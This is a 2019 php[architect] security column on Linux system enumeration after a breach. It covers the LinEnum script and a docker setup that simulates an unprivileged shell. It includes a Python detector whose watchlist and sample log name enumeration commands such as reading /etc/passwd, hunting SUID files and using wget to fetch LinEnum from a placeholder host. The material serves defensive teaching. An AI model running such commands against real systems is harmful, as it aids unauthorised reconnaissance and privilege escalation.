phparchitect-2019-08

32 \ August 2019 \ http://www.phparch.com

Security Corner


System Enumeration

Eric Mann


The first step to protecting your system is to understand the actions, behaviors, and motivations of
those who would potentially breach and damage that system. Learning to think like an attacker is
excellent. Mastering the tools attackers are likely to use on your platform is even better.

No system is ever entirely secure. One of the libraries your
application relies upon probably has a vulnerability lying in
wait, undetected, for an attacker to exploit. Your code might
have a flaw that’s hidden beneath a deep unit test suite just
waiting for an attacker to pounce.
You can only protect yourself from the attacks you know are
coming. If there’s an unknown attack out there, the best you
can do is assume you’ll face it and prepare for the inevitable
remediation to follow. Assuming you’re well-prepared, you’re
already exhaustively logging and monitoring^1 your system to
keep an eye open for unexpected behavior, new user creation,
or other administrative events that indicate an attacker is
inside the machine. The question isn’t that they’ll get in, it’s
what exactly they’ll do once they’ve breached your system.

The First Few Moments


The first few moments an attacker is on the inside are critical.
They’ve breached your outer defenses and are free to
run rampant through your files, database, and server. This
freedom means they can do just about anything they want—
but it comes at a price. The more an attacker does within a
system, the more likely it is the victim will notice.
An attacker must gather as much information as possible,
as quickly as they can, with as few commands as they can
manage. This behavior helps maximize the data available for
future attacks while minimizing the footprint left behind to
alert you they were ever there.
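The flip side of that footprint is that an enumeration burst is detectable if you are already logging commands per user. The following is an added example, not code from the article: it runs a small burst detector over a constructed "timestamp uid command" log (the format, the watchlist of commands and the sample lines are all assumptions for the example) and flags any user who runs several distinct enumeration commands inside a ten-minute window.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Commands a quick enumeration pass (manual or LinEnum-style) tends to run.
# Assumed watchlist for this example; tune it to your own baseline.
ENUM_COMMANDS = {
    "id", "whoami", "uname", "cat /etc/passwd", "cat /etc/os-release", "find / -perm -4000",
    "sudo -l", "ps aux", "netstat", "ss", "crontab -l", "env", "mount", "df", "wget", "curl",
}

# Constructed sample log in a simple "ISO-timestamp uid command" format
# (e.g. auditd execve records flattened by a forwarder). Not real data.
SAMPLE_LOG = """\
2019-06-27T09:10:00 1000 df -h
2019-06-27T09:50:00 1000 ps aux
2019-06-27T10:00:01 65534 whoami
2019-06-27T10:00:03 65534 pwd
2019-06-27T10:00:10 65534 id
2019-06-27T10:00:15 65534 uname -a
2019-06-27T10:00:40 65534 cat /etc/passwd
2019-06-27T10:01:05 65534 find / -perm -4000 -type f 2>/dev/null
2019-06-27T10:01:30 65534 sudo -l
2019-06-27T10:02:00 65534 wget http://placeholder.invalid/LinEnum.sh
"""

def parse_line(line):
    """Split 'timestamp uid command' into (datetime, uid, command)."""
    ts, uid, cmd = line.split(" ", 2)
    return datetime.fromisoformat(ts), uid, cmd

def is_enum_command(cmd):
    """True for a watchlist command, bare or followed by arguments."""
    return any(cmd == c or cmd.startswith(c + " ") for c in ENUM_COMMANDS)

def detect_enum_bursts(log_text, window_seconds=600, threshold=5):
    """uid -> (window start, distinct count) once `threshold` enum commands land in one window."""
    recent = defaultdict(deque)  # uid -> (timestamp, command) pairs still inside the window
    alerts = {}
    for line in log_text.strip().splitlines():
        ts, uid, cmd = parse_line(line)
        if not is_enum_command(cmd):
            continue
        window = recent[uid]
        window.append((ts, cmd))
        while ts - window[0][0] > timedelta(seconds=window_seconds):
            window.popleft()  # drop entries older than the window
        distinct = {c for _, c in window}
        if len(distinct) >= threshold and uid not in alerts:
            alerts[uid] = (window[0][0], len(distinct))
    return alerts
```

On the sample, uid 1000's two admin commands are 40 minutes apart and never accumulate, while uid 65534 (nobody) trips the threshold a minute into its session.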

Linux Enumeration


Hey hackers!
You get a low priv shell on a linux box.
You have 10 minutes before blue detects you. ⏱
After you’ve done the quick & basic whoami/pwd type
stuff...
What are any TWO of the next ten commands you run
to get the most gains/enum in your 10 minutes?
@JaneScott, June 27, 2019

Security professionals frequently work together and
exchange notes to refine best practices and help strengthen
the community as a whole. It’s refreshing to see experts
collaborating to help keep one another—and those they work
with—secure. It’s also enlightening to see the kinds of tools
they develop and exchange as each can help you strengthen
your game as well.

1 exhaustively logging and monitoring:
https://phpa.me/security-corner-jan-2018

One of the more popular and easier-to-use tools for
system enumeration in Linux is the aptly-named LinEnum^2.
LinEnum is a simple script that enumerates information
about the machine it’s run on. It also helps identify ways the
current, unprivileged user might escalate their level of access
to the system and perform deeper attacks.

LinEnum in Action
To demonstrate how LinEnum does its magic, we’re going
to spin up a limited use Docker container to simulate our
production server. You could alternatively run things inside a
fully-fledged virtual machine. The Docker instance gives us a
similar environment and helps demonstrate how an attacker
might attempt to breach a container running in production.
The following one-liner creates a container based on a small
Alpine-derived image which has nothing in it but the wget
utility. We override the Docker entry point to put ourselves on
a shell as if we’d logged in using sniffed or guessed credentials.
The additional --user flag ensures we are authenticated as
a non-privileged user^3—in this case, nobody.
In practice, an attacker might attempt to log in as anyone
who has access to the machine. The usual avenue of attack
is the root user, who exists by default. In other systems, an
attacker might look for a webuser, or nginx, or www-data or a
similar, standard username that exists on most systems. If
they ever get in, they can do exactly as we’re about to do with
nobody in our Docker container.

docker run -it --rm --entrypoint=/bin/sh \
--user 65534:65534 mwendler/wget

Your production server might be running Alpine. It
might be running Debian, or it might be running something
else. Regardless, if someone has permission to log in
to your server, and wget is available, this example works.
If you have curl available, or a language (like PHP) that
can download files via a script, it’s not too difficult to
change this example. Just removing wget is not a solution
to this issue.

2 LinEnum: https://github.com/rebootuser/LinEnum
3 non-privileged user: https://phpa.me/security-corner-apr-2018